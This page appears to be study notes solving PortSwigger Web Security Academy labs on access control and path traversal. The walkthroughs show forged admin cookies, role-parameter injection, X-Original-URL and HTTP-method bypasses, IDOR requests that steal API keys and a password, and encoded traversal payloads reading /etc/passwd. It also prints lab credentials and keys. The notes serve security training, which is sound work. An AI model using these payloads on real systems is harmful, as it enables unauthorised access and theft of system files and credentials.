🔬Vulnerability Labs
🌐 Resources 🔗
Find the admin panel and delete the user
carlos.
GET /robots.txt
# Response
HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 45
User-agent: *
Disallow: /administrator-panel
GET /administrator-panel
GET /administrator-panel/delete?username=carlos
# User deleted
Find the unpredictable admin panel and delete user
carlos.
GET /login
Admin panel found in the code of the
/or/loginpage response for example
<script>
var isAdmin = false;
if (isAdmin) {
var topLinksTag = document.getElementsByClassName("top-links")[0];
var adminPanelTag = document.createElement('a');
adminPanelTag.setAttribute('href', '/admin-ge6wcp');
adminPanelTag.innerText = 'Admin panel';
topLinksTag.append(adminPanelTag);
var pTag = document.createElement('p');
pTag.innerText = '|';
topLinksTag.appendChild(pTag);
}
</script>GET /admin-ge6wcp
GET /admin-ge6wcp/delete?username=carlos
# User deleted
Access the
/adminpanel and use it to delete usercarlos.Admin panel use a forgeable cookie to identify administrators.
User's creds:
wiener:peter
POST /login
# The response sets the cookie
GET /admin
Send this request to the repeater and forge the cookie with
Admin=true
Delete user
carlosonce the admin panel login is bypassed.Burp Proxy interception (or browser Dev Tools) can be used too, while logging in, to set the Cookie to
Admin=true, and to access the Admin panel from/my-account.
# Request
GET /admin/delete?username=carlos HTTP/2
Host: 0a060030038bec7c8214d8b600eb00c1.web-security-academy.net
Cookie: Admin=true; session=dxgdmGbBWv76i4PMyyDoYYW666smj1er
...
App's
/adminpanel is accessible only to users withroleid= 2.Access the
/adminpanel and use it to delete usercarlos.
POST /login HTTP/2
...
username=wiener&password=peterOnce logged in, update the email
POST /my-account/change-email
Send this POST request to the repeater and add
"roleid:2"into the JSON body
POST /my-account/change-email HTTP/2
Host: 0a2200c20471b32f842c9ada00f700c3.web-security-academy.net
...
{"email":"[email protected]",
"roleid": 2
}
Browse to
/adminand delete user
External access to
/adminpanel is blocked at front-end. Back-end supportsX-Original-URLheader.Access the
/adminpanel and use it to delete usercarlos.
GET /admin
Send a Request to
/with anX-Original-URLheader pointing top a non-existing resourceWith re response
404 Not Foundit means the app supports the special request headers
GET / HTTP/2
X-Original-Url: /invalid
...
Send an allowed URL as main and the real target in the
X-Original-URL
GET / HTTP/2
X-Original-Url: /admin
...
Delete user using the
X-Original-Urlheader
GET /?username=carlos HTTP/2
X-Original-Url: /admin/delete
...
App's access control is based on the HTTP method of requests.
Admin creds:
administrator:admin.Login with
wiener:petercredentials and exploit the access control to promote the user to an administrator.
Login as
administrator, promotecarlosand send the request to the repeater
Login with
wienerin an incognito windows and get the session cookie. Input the session cookie in the existing repeater request ->Unauthorized
Change the method to
POSTX->Missing parameter 'username'
Right click on the request and convert it to
GETwithChange request methodSet the username to
wienerand send itGETmethod is allowed
GET /admin-roles?username=wiener&action=upgrade HTTP/2
wieneruser has access to the admin panel now
Login with
wiener:petercredentials and exploit the horizontal privesc vulnerability on the account page to getcarlos's API key.
Login as
wienerand send the request to the repeaterChange the
idtoid=carlosand send the GET request to get the Carlos's API key
GET /my-account?id=carlos HTTP/2
Click the
Submit solutionbutton and paste the API key to solve the lab -eXXoHWSpwaZpxBAXr7MbVt9GMoEuCpy9
The app identifies users with GUIDs.
Login with
wiener:petercredentials and exploit the horizontal privesc vulnerability on the account page to getcarlos's GUID and API key.
Find a
carlosblog post and get its user ID./blogsleaks the account'suserID
userId=fe62ab1c-3eb7-47b8-862b-1c1c47a5490cLogin as
wiener, go to the account page and send the request to the repeaterChange the
idtoid=fe62ab1c-3eb7-47b8-862b-1c1c47a5490cand send the GET request to get the Carlos's API key
GET /my-account?id=fe62ab1c-3eb7-47b8-862b-1c1c47a5490c HTTP/2
Click the
Submit solutionbutton and paste the API key to solve the lab -p3UtBNlmwKtAnEf0PKgBcW9sPQNJcMLq
The app leaks sensitive information in the body of a redirect response
Login with
wiener:petercredentials and exploit the access control vulnerability to getcarlos's API key.
Login as
wiener, access the account page via browser and change theidtoid=carlosand send the GET request to get the Carlos's API key
GET /my-account?id=carlos HTTP/2
# Response
HTTP/2 302 FoundThis request is redirected to the login page. Check the redirect body content in BurpSuite and find the
carlosAPI key
Click the
Submit solutionbutton and paste the API key to solve the lab -ah9Nwj1bvuWv5uvWPK86EBHZCnghqRHe
The user account page leaks password in a masked input.
Login with
wiener:petercredentials, retrieveadministratorpassword and deletecarlosuser.
Login as
wienerand access the account pageChange the
idtoid=administratorand check the response containing the administrator's password
Login as
administrator:dta5qwrsg998j416zqh0and deletecarlos
🌐 Resources 🔗
Open BurpSuite - Turn off the intercept - Open its internal Browser and open the lab link - Check HTTP history for intercepted requests - Check Images in the Filter settings
Find a fetched product image Request
right click on it and
Send to Repeater, or select it and pressCTRL+R
Change the Request
# From this
GET /image?filename=5.jpg
# To this
GET /image?filename=../../../etc/passwd
The app blocks path traversal sequences but treats the filename as relative to a default working directory.
GET /image?filename=21.jpg
GET /image?filename=../../../etc/passwd # 400 Bad Request
# Try with absolute path
GET /image?filename=/etc/passwd
The app strips path traversal sequences from the supplied filename before using it.
GET /image?filename=....//....//....//etc/passwd
The app blocks input containing path traversal sequences and then performs URL-decode before using it.
With
../../../etc/passwdit does not workUse BurpSuite Decoder to double URL-Encode the
../../../etc/passwdstring\/should always be encoded
..%2f..%2f..%2fetc%2fpasswd # 400 Bad Request - URL-encoded once
# Doubl URL-Encoded
GET /image?filename=..%252f..%252f..%252fetc%252fpasswd
The application transmits the full file path and validates that it starts with the expected folder.
GET /image?filename=/var/www/images/../../../etc/passwd
# or (better)
GET /image?filename=%2fvar%2fwww%2fimages%2f..%2f..%2f..%2fetc%2fpasswd
The app validates the supplied filename end with expected file extension.
Use a null byte character
\0to represent the end of the string../../../etc/passwd\0.png>..%2f..%2f..%2fetc%2fpasswd%00.pngthe O.S. requests retrieval of the string, it assumes the string is terminated after
passwd
GET /image?filename=../../../etc/passwd%00.png
# URL-encoded
GET /image?filename=..%2f..%2f..%2fetc%2fpasswd%00.png
Last updated
Was this helpful?